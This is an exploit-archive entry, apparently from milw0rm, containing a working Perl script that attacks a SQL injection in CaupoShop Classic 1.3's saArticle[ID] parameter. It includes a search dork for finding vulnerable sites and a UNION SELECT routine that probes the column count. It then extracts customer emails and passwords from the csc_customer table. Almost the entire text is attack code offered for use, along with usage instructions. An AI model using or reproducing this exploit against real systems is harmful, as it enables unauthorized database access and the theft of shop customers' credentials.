CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability#!/usr/bin/perl ###################### # #CaupoShop Classic 1.3 Remote Exploit # ###################### # #Bug by: h0yt3r # #Dork: inurl:csc_article_details.php # Couldnt find a stable dork for this specific Version. #Exploit will only work on correct version. # ## ### ## # #I found this long time ago but never actually shared it. #As the userid's are a bit messy you will only get the top 1 row value. #Change it if you like. # #Gr33tz go to: #thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team ######## use LWP::UserAgent; my $userAgent = LWP::UserAgent->new; usage(); $server = $ARGV[0]; $dir = $ARGV[1]; print`\n`; if (!$dir) { die `Read Usage!\n`; } $filename =`csc_article_details.php`; my $url = `http://`.$server.$dir.$filename.`?`; my $Attack= $userAgent->get($url); if ($Attack->is_success) { print `[x] Attacking `.$url.`\n`; } else { print `Couldn't connect to `.$url.`!`; exit; } print `[x] Injecting Black Magic\n`; my @count = (`66666`); for ($i = 6; $i<99; $i++) { my $selectUrl = $url.`saArticle[ID]=-275 union select 1,2,3,4, @count`; my $Attack= $userAgent->get($selectUrl); if($Attack->content =~ 66666) { last; } else { push(@count,`,66666`); } } my $Final = $url.`saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer`; my $Attack= $userAgent->get($Final); if($Attack->content =~ m/1337(.*?):(.*?)1337/i) { my $login = $1; my $pass = $2; print `[x] Success!\n`; print `[x] Top 1 User Details:\n`; print ` Username: `.$login.`\n`; print ` Password: `.$pass.`\n`; } else { print`[x] Something wrong...Version?\n`; exit; } sub usage() { print q { ##################################################### CaupoShop Classic Remote Exploit -Written by h0yt3r- Usage: CC.pl [Server] [Path] Sample: perl CC.pl www.site.com /shop/ ###################################################### }; } #eof # milw0rm.com [2008-06-19]